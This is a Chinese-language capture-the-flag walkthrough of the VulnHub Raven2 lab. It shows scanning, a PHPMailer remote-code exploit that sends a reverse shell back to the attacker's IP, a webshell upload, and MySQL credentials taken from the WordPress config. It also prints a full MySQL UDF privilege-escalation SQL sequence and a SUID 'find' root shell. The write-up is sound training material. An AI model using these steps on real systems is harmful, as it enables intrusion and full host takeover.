首页靶场

# Raven2 靶场

# 环境准备:

攻击机:

​ Kali2021 系统 IP:192.168.226.131

​ Win10 系统 IP:192.168.226.136

靶场下载地址:

百度网盘链接:https://pan.baidu.com/s/1vbtCDRKse-AZ-VUhoSkbvA 提取码:60zo

​ 或者

vulnhub 下载:https://www.vulnhub.com/entry/raven-2,269/

# 具体步骤:

先进行主机探测

​ nmap -sP 192.168.226.1/24

扫存活主机

得到靶场 IP 为 192.168.226.132

再对该 IP 进行端口扫描

​ nmap -A 192.168.226.132

扫端口

发现 22、80、111 端口开放

浏览器访问 80 端口

80网站

使用 dirsearch 进行目录扫描

目录扫描结果

访问扫出来的目录

其中 vendor 目录存在目录遍历

vendor目录遍历

VERSION 中有个版本号

版本号

PATH 文件显示了绝对路径

路径

通过 changelog.md 中得到的信息可以推断前面的版本号为 PHPMailer 的版本号

PHPMail版本

使用 Kali 中的 searchsploit 来查询此 web 应用的漏洞

searchsploit PHPMailer

使用searchsploit查询漏洞

这里我们选择使用 40974.py,查询下路径

获取exp路径

将其 copy 出来

copy

修改下 EXP

修改exp

其中 target 为 http:// 靶机 IP/contact.php

backdoor 为 生成的后门文件的名字,自定义

payload 中的 IP 改为攻击机的 IP

fields 中 - X 后面改成刚才获取到的绝对路径 / 后门文件

修改完后,运行此 EXP

运行exp

运行完后访问 http:// 靶机 IP/contact.php

访问触发

这时就会产生后门文件,NC 监听下端口 4444

监听并访问

访问后门文件后,成功监听到,权限为低权限

由于觉得监听界面不太友好,我就写了个一句话进去

写个一句话马

使用蚁剑连接一句话

蚁剑连接

因为他是存在有 WordPress 的,所以看下 WordPress 的配置文件

访问WordPress

数据库密码

获取到 MySQL 得到账号密码 root/R@v3nSecurity

查询下 MySQL 运行权限

root权限

为 root 权限

连接下数据库,查询数据库版本

数据库版本

MySQL 版本为 5.5.60

进行 udf 提权

使用 select @@plugin_dir 查看当前数据库扩展插件存放的位置

查询插件目录

udf 提权所需的扩展,通过 searchsploit User-Defined Func 查找

查找udf

此处选用 1518.c,查询其路径,copy 出来

copyudf并编译

进行编译,生成 .so 文件,上传至 /tmp

上传

加载扩展,进行提权

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/mysql.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/mysql.so';
create function do_system returns integer soname 'mysql.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');

提权

提权2

完成后执行

touch finn

find finn -exec "/bin/sh" /;

提权成功

权限为 root,提权完成

也可以上传个 msf 马

生马

监听

msf监听到